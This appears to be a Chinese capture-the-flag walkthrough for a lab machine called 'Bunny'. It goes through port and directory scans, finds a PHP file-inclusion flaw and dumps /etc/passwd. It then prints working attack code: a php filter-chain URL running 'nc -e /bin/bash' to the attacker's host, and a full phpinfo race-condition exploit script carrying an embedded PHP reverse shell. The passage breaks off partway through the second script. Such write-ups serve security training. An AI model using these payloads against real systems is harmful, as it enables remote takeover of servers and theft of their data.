![\"image-20240903190148737\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409041432522.png\")
<\/div>\n
![\"image-20240904125213544\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409041432524.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.101:22\nOpen 192.168.10.101:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 98:7a:07:5b:ed:f7:76:e3:f5:2e:10:16:ba:61:dd:77 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDoombspKP+O01F6h55sJsPNA3dkpjUECHfaJf7pxuOtpJj9oPxcOxjOq\/sPtsa1R\/1A5bDxnYTdUcj0O7IsW7fduqGlEyO0IP8+ho+jENFOBaJn2Tfx7EtO3qEGY26jpw\/PiIgKql1jlJWda8fjITDcREwkNWtJUYnvGA+X9ZO35IYMmf85HVMQbuRxhpBTR1M7h7lXKOhj0iZ+oxVnp0M6M9EuLzD\/hOAeUWY6eS03NMKPBGD7DKd9w\/flSX5bHaz5SHwwOBNtmvPWCWPIOqH21NdIWAFo23muI4baJXbENJ+8A1RbBn0JHZvJRSwFYomuMBHhtzzRK\/ciAywhKg7\n| 256 bc:f8:11:12:e7:cb:20:c5:6c:87:00:b5:57:43:22:d3 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHW6x3BYJZwj\/aQneGntyj+7MbnMB9So\/Z9uGSkJC+rsHxTelO+A6dAGuNvz3EFdz6LWNyj6N\/JdgUfDc+je+Io=\n| 256 9a:61:00:d8:47:fb:7c:b1:a3:4d:4c:f6:8d:5e:40:59 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILkHqSq+74ki8Nl2f2BUe1oCBsCUuBhUml+GII8R4C4P\n80\/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))\n|_http-title: Site doesn't have a title (text\/html; charset=UTF-8).\n|_http-server-header: Apache\/2.4.38 (Debian)\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.10.101\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404,301,401,403\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,html,txt\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php (Status: 200) [Size: 25]\n\/upload.php (Status: 200) [Size: 27305]\n\/password.txt (Status: 200) [Size: 537]\n\/config.php (Status: 200) [Size: 24691]\nProgress: 22068 \/ 882244 (2.50%)[ERROR] Get "http:\/\/192.168.10.101\/dhtml": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 35331 \/ 882244 (4.00%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 35511 \/ 882244 (4.03%)\n===============================================================\nFinished\n===============================================================\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php -b 301,401,403,404 -t 100 -q\n\/index.php (Status: 200) [Size: 25]\n\/upload.php (Status: 200) [Size: 27305]\n\/config.php (Status: 200) [Size: 24691]\n\/phpinfo.php (Status: 200) [Size: 95618]<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20240904130303073\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ curl -s http:\/\/$IP | html2text\n[bunny.jpg]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ whatweb http:\/\/$IP \nhttp:\/\/192.168.10.101 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[192.168.10.101]<\/code><\/pre>\n\u654f\u611f\u76ee\u5f55<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ curl -s http:\/\/$IP\/password.txt\n \/| ,\n ,\/\/\/ \/|\n \/\/ \/\/ ,\/\/\/\n \/\/ \/\/ \/\/ \/\/\n \/\/ \/\/ || ||\n || || \/\/ \/\/\n || || \/\/ \/\/\n || || \/\/ \/\/\n || || || ||\n \\\\,\\|,|\\_\/\/\n \\\\)\\)\\\\|\/\n )-."" .-(\n \/\/^\\` `\/^\\\\\n \/\/ | | \\\\\n ,\/_| 0| _ | 0|_\\,\n \/` `"=.v.="` `\\\n \/` _."{_,_}"._ `\\\n `\/` ` \\ ||| \/ ` `\\`\n `",_ \\\\=^~^=\/\/ _,"`\n "=,\\'-=-'\/,="\n '---'\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ curl -s http:\/\/$IP\/config.php \n0101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101...................\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ curl -s http:\/\/$IP\/upload.php\n01010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010\n...................<\/code><\/pre>\n<\/div><\/p>\nfuzz<\/h3>\n
\u5c1d\u8bd5fuzz\u4e00\u4e0b\u76f8\u5173\u53c2\u6570\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ ffuf -c -u 'http:\/\/192.168.10.101\/index.php?FUZZ=\/etc\/passwd' -w \/usr\/share\/wordlists\/dirbuster\/directory-list-lowercase-2.3-medium.txt --fs 25\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.10.101\/index.php?FUZZ=\/etc\/passwd\n :: Wordlist : FUZZ: \/usr\/share\/wordlists\/dirbuster\/directory-list-lowercase-2.3-medium.txt\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter : Response size: 25\n________________________________________________\n\npage [Status: 200, Size: 1508, Words: 16, Lines: 32, Duration: 3ms]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ curl -s http:\/\/$IP\/index.php?page=\/etc\/passwd\n<img src="bunny.jpg">\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:112:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nchris:x:1000:1000:chris,,,:\/home\/chris:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin<\/code><\/pre>\n\u65b9\u6cd5\u4e00\uff1afilter\u5229\u7528\u94fe<\/h3>\nhttp:\/\/192.168.10.101\/index.php?page=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd<\/code><\/pre>\n\u53d1\u73b0\u53ef\u4ee5\u6b63\u5e38\u8fdb\u884c LFI\uff0c\u6545\u5c1d\u8bd5\u4e00\u4e0bphp_filter_chain<\/code>\uff1a<\/p>\nhttp:\/\/192.168.10.101\/index.php?page=php:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp&0=nc%20-e%20\/bin\/bash%20192.168.10.106%201234<\/code><\/pre>\n<\/div><\/p>\n\u65b9\u6cd5\u4e8c\uff1aphpinfolfi(\u4f5c\u8005\u89e3\u6cd5)<\/h3>\n
\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\u6709\u65e0\u76f8\u5173\u7684\u6f0f\u6d1e\uff0c\u53c2\u8003 https:\/\/book.hacktricks.xyz\/pentesting-web\/file-inclusion\/lfi2rce-via-phpinfo<\/a><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ wget https:\/\/insomniasec.com\/downloads\/publications\/phpinfolfi.py\n--2024-09-04 01:23:58-- https:\/\/insomniasec.com\/downloads\/publications\/phpinfolfi.py\nResolving insomniasec.com (insomniasec.com)... 65.9.141.126, 65.9.141.107, 65.9.141.4, ...\nConnecting to insomniasec.com (insomniasec.com)|65.9.141.126|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 4888 (4.8K) [binary\/octet-stream]\nSaving to: \u2018phpinfolfi.py\u2019\n\nphpinfolfi.py 100%[====================================================================================================>] 4.77K --.-KB\/s in 0.003s \n\n2024-09-04 01:24:01 (1.50 MB\/s) - \u2018phpinfolfi.py\u2019 saved [4888\/4888]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ cat phpinfolfi.py \n#!\/usr\/bin\/python \nimport sys\nimport threading\nimport socket\n\ndef setup(host, port):\n TAG="Security Test"\n PAYLOAD="""%s\\r\n<?php $c=fopen('\/tmp\/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\\r""" % TAG\n REQ1_DATA="""-----------------------------7dbff1ded0714\\r\nContent-Disposition: form-data; name="dummyname"; filename="test.txt"\\r\nContent-Type: text\/plain\\r\n\\r\n%s\n-----------------------------7dbff1ded0714--\\r""" % PAYLOAD\n padding="A" * 5000\n REQ1="""POST \/phpinfo.php?a="""+padding+""" HTTP\/1.1\\r\nCookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\\r\nHTTP_ACCEPT: """ + padding + """\\r\nHTTP_USER_AGENT: """+padding+"""\\r\nHTTP_ACCEPT_LANGUAGE: """+padding+"""\\r\nHTTP_PRAGMA: """+padding+"""\\r\nContent-Type: multipart\/form-data; boundary=---------------------------7dbff1ded0714\\r\nContent-Length: %s\\r\nHost: %s\\r\n\\r\n%s""" %(len(REQ1_DATA),host,REQ1_DATA)\n #modify this to suit the LFI script \n LFIREQ="""GET \/lfi.php?load=%s%%00 HTTP\/1.1\\r\nUser-Agent: Mozilla\/4.0\\r\nProxy-Connection: Keep-Alive\\r\nHost: %s\\r\n\\r\n\\r\n"""\n return (REQ1, TAG, LFIREQ)\n\ndef phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\n s.connect((host, port))\n s2.connect((host, port))\n\n s.send(phpinforeq)\n d = ""\n while len(d) < offset:\n d += s.recv(offset)\n try:\n i = d.index("[tmp_name] =>")\n fn = d[i+17:i+31]\n except ValueError:\n return None\n\n s2.send(lfireq % (fn, host))\n d = s2.recv(4096)\n s.close()\n s2.close()\n\n if d.find(tag) != -1:\n return fn\n\ncounter=0\nclass ThreadWorker(threading.Thread):\n def __init__(self, e, l, m, *args):\n threading.Thread.__init__(self)\n self.event = e\n self.lock = l\n self.maxattempts = m\n self.args = args\n\n def run(self):\n global counter\n while not self.event.is_set():\n with self.lock:\n if counter >= self.maxattempts:\n return\n counter+=1\n\n try:\n x = phpInfoLFI(*self.args)\n if self.event.is_set():\n break \n if x:\n print "\\nGot it! Shell created in \/tmp\/g"\n self.event.set()\n\n except socket.error:\n return\n\ndef getOffset(host, port, phpinforeq):\n """Gets offset of tmp_name in the php output"""\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host,port))\n s.send(phpinforeq)\n\n d = ""\n while True:\n i = s.recv(4096)\n d+=i \n if i == "":\n break\n # detect the final chunk\n if i.endswith("0\\r\\n\\r\\n"):\n break\n s.close()\n i = d.find("[tmp_name] =>")\n if i == -1:\n raise ValueError("No php tmp_name in phpinfo output")\n\n print "found %s at %i" % (d[i:i+10],i)\n # padded up a bit\n return i+256\n\ndef main():\n\n print "LFI With PHPInfo()"\n print "-=" * 30\n\n if len(sys.argv) < 2:\n print "Usage: %s host [port] [threads]" % sys.argv[0]\n sys.exit(1)\n\n try:\n host = socket.gethostbyname(sys.argv[1])\n except socket.error, e:\n print "Error with hostname %s: %s" % (sys.argv[1], e)\n sys.exit(1)\n\n port=80\n try:\n port = int(sys.argv[2])\n except IndexError:\n pass\n except ValueError, e:\n print "Error with port %d: %s" % (sys.argv[2], e)\n sys.exit(1)\n\n poolsz=10\n try:\n poolsz = int(sys.argv[3])\n except IndexError:\n pass\n except ValueError, e:\n print "Error with poolsz %d: %s" % (sys.argv[3], e)\n sys.exit(1)\n\n print "Getting initial offset...", \n reqphp, tag, reqlfi = setup(host, port)\n offset = getOffset(host, port, reqphp)\n sys.stdout.flush()\n\n maxattempts = 1000\n e = threading.Event()\n l = threading.Lock()\n\n print "Spawning worker pool (%d)..." % poolsz\n sys.stdout.flush()\n\n tp = []\n for i in range(0,poolsz):\n tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))\n\n for t in tp:\n t.start()\n try:\n while not e.wait(1):\n if e.is_set():\n break\n with l:\n sys.stdout.write( "\\r% 4d \/ % 4d" % (counter, maxattempts))\n sys.stdout.flush()\n if counter >= maxattempts:\n break\n print\n if e.is_set():\n print "Woot! \\m\/"\n else:\n print ":("\n except KeyboardInterrupt:\n print "\\nTelling threads to shutdown..."\n e.set()\n\n print "Shuttin' down..."\n for t in tp:\n t.join()\n\nif __name__=="__main__":\n main()<\/code><\/pre>\n\u5c1d\u8bd5\u83b7\u53d6\u4e34\u65f6\u76ee\u5f55\u540d\u79f0\uff1a<\/p>\n
import requests\n\nurl = 'http:\/\/192.168.10.101\/phpinfo.php'\nfiles = {'file': open('test.txt', 'rb')}\n\nr = requests.post(url=url, files=files)\nprint(r.text)<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ python upload.py | grep tmp_name\n [tmp_name] => \/tmp\/php6ETEyu\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Bunny]\n\u2514\u2500$ sed -i 's\/\\[tmp_name\\] \\=>\/\\[tmp_name\\] =\\>\/g' phpinfolfi.py<\/code><\/pre>\n\u4fee\u6539\u4e0a\u8ff0\u5229\u7528\u811a\u672c\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
#!\/usr\/bin\/python \nimport sys\nimport threading\nimport socket\n\ndef setup(host, port):\n TAG="Security Test"\n PAYLOAD="""%s\\r\n\n <?php\n \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '192.168.10.106'; \/\/ You have changed this\n $port = 1234; \/\/ And this\n $chunk_size = 1400;\n $write_a = null;\n $error_a = null;\n $shell = 'uname -a; w; id; \/bin\/sh -i';\n $daemon = 0;\n $debug = 0;\n\n \/\/\n \/\/ Daemonise ourself if possible to avoid zombies later\n \/\/\n\n \/\/ pcntl_fork is hardly ever available, but will allow us to daemonise\n \/\/ our php process and avoid zombies. Worth a try...\n if (function_exists('pcntl_fork')) {\n \/\/ Fork and have the parent process exit\n $pid = pcntl_fork();\n\n if ($pid == -1) {\n printit("ERROR: Can't fork");\n exit(1);\n }\n\n if ($pid) {\n exit(0); \/\/ Parent exits\n }\n\n \/\/ Make the current process a session leader\n \/\/ Will only succeed if we forked\n if (posix_setsid() == -1) {\n printit("Error: Can't setsid()");\n exit(1);\n }\n\n $daemon = 1;\n } else {\n printit("WARNING: Failed to daemonise. This is quite common and not fatal.");\n }\n\n \/\/ Change to a safe directory\n chdir("\/");\n\n \/\/ Remove any umask we inherited\n umask(0);\n\n \/\/\n \/\/ Do the reverse shell...\n \/\/\n\n \/\/ Open reverse connection\n $sock = fsockopen($ip, $port, $errno, $errstr, 30);\n if (!$sock) {\n printit("$errstr ($errno)");\n exit(1);\n }\n\n \/\/ Spawn shell process\n $descriptorspec = array(\n 0 => array("pipe", "r"), \/\/ stdin is a pipe that the child will read from\n 1 => array("pipe", "w"), \/\/ stdout is a pipe that the child will write to\n 2 => array("pipe", "w") \/\/ stderr is a pipe that the child will write to\n );\n\n $process = proc_open($shell, $descriptorspec, $pipes);\n\n if (!is_resource($process)) {\n printit("ERROR: Can't spawn shell");\n exit(1);\n }\n\n \/\/ Set everything to non-blocking\n \/\/ Reason: Occsionally reads will block, even though stream_select tells us they won't\n stream_set_blocking($pipes[0], 0);\n stream_set_blocking($pipes[1], 0);\n stream_set_blocking($pipes[2], 0);\n stream_set_blocking($sock, 0);\n\n printit("Successfully opened reverse shell to $ip:$port");\n\n while (1) {\n \/\/ Check for end of TCP connection\n if (feof($sock)) {\n printit("ERROR: Shell connection terminated");\n break;\n }\n\n \/\/ Check for end of STDOUT\n if (feof($pipes[1])) {\n printit("ERROR: Shell process terminated");\n break;\n }\n\n \/\/ Wait until a command is end down $sock, or some\n \/\/ command output is available on STDOUT or STDERR\n $read_a = array($sock, $pipes[1], $pipes[2]);\n $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n \/\/ If we can read from the TCP socket, send\n \/\/ data to process's STDIN\n if (in_array($sock, $read_a)) {\n if ($debug) printit("SOCK READ");\n $input = fread($sock, $chunk_size);\n if ($debug) printit("SOCK: $input");\n fwrite($pipes[0], $input);\n }\n\n \/\/ If we can read from the process's STDOUT\n \/\/ send data down tcp connection\n if (in_array($pipes[1], $read_a)) {\n if ($debug) printit("STDOUT READ");\n $input = fread($pipes[1], $chunk_size);\n if ($debug) printit("STDOUT: $input");\n fwrite($sock, $input);\n }\n\n \/\/ If we can read from the process's STDERR\n \/\/ send data down tcp connection\n if (in_array($pipes[2], $read_a)) {\n if ($debug) printit("STDERR READ");\n $input = fread($pipes[2], $chunk_size);\n if ($debug) printit("STDERR: $input");\n fwrite($sock, $input);\n }\n }\n\n fclose($sock);\n fclose($pipes[0]);\n fclose($pipes[1]);\n fclose($pipes[2]);\n proc_close($process);\n\n \/\/ Like print, but does nothing if we've daemonised ourself\n \/\/ (I can't figure out how to redirect STDOUT like a proper daemon)\n function printit ($string) {\n if (!$daemon) {\n print "$string\n";\n }\n }\n\n ?> \n\n\\r""" % TAG\n REQ1_DATA="""-----------------------------7dbff1ded0714\\r\nContent-Disposition: form-data; name="dummyname"; filename="test.txt"\\r\nContent-Type: text\/plain\\r\n\\r\n%s\n-----------------------------7dbff1ded0714--\\r""" % PAYLOAD\n padding="A" * 5000\n REQ1="""POST \/phpinfo.php?a="""+padding+""" HTTP\/1.1\\r\nCookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\\r\nHTTP_ACCEPT: """ + padding + """\\r\nHTTP_USER_AGENT: """+padding+"""\\r\nHTTP_ACCEPT_LANGUAGE: """+padding+"""\\r\nHTTP_PRAGMA: """+padding+"""\\r\nContent-Type: multipart\/form-data; boundary=---------------------------7dbff1ded0714\\r\nContent-Length: %s\\r\nHost: %s\\r\n\\r\n%s""" %(len(REQ1_DATA),host,REQ1_DATA)\n #modify this to suit the LFI script \n LFIREQ="""GET \/index.php?page=%s HTTP\/1.1\\r\nUser-Agent: Mozilla\/4.0\\r\nProxy-Connection: Keep-Alive\\r\nHost: %s\\r\n\\r\n\\r\n"""\n return (REQ1, TAG, LFIREQ)\n\ndef phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\n s.connect((host, port))\n s2.connect((host, port))\n\n s.send(phpinforeq)\n d = ""\n while len(d) < offset:\n d += s.recv(offset)\n try:\n i = d.index("[tmp_name] =>")\n fn = d[i+17:i+31]\n except ValueError:\n return None\n\n s2.send(lfireq % (fn, host))\n d = s2.recv(4096)\n s.close()\n s2.close()\n\n if d.find(tag) != -1:\n return fn\n\ncounter=0\nclass ThreadWorker(threading.Thread):\n def __init__(self, e, l, m, *args):\n threading.Thread.__init__(self)\n self.event = e\n self.lock = l\n self.maxattempts = m\n self.args = args\n\n def run(self):\n global counter\n while not self.event.is_set():\n with self.lock:\n if counter >= self.maxattempts:\n return\n counter+=1\n\n try:\n x = phpInfoLFI(*self.args)\n if self.event.is_set():\n break \n if x:\n print "\\nGot it! Shell created in \/tmp\/g"\n self.event.set()\n\n except socket.error:\n return\n\ndef getOffset(host, port, phpinforeq):\n """Gets offset of tmp_name in the php output"""\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host,port))\n s.send(phpinforeq)\n\n d = ""\n while True:\n i = s.recv(4096)\n d+=i \n if i == "":\n break\n # detect the final chunk\n if i.endswith("0\\r\\n\\r\\n"):\n break\n s.close()\n i = d.find("[tmp_name] =>")\n if i == -1:\n raise ValueError("No php tmp_name in phpinfo 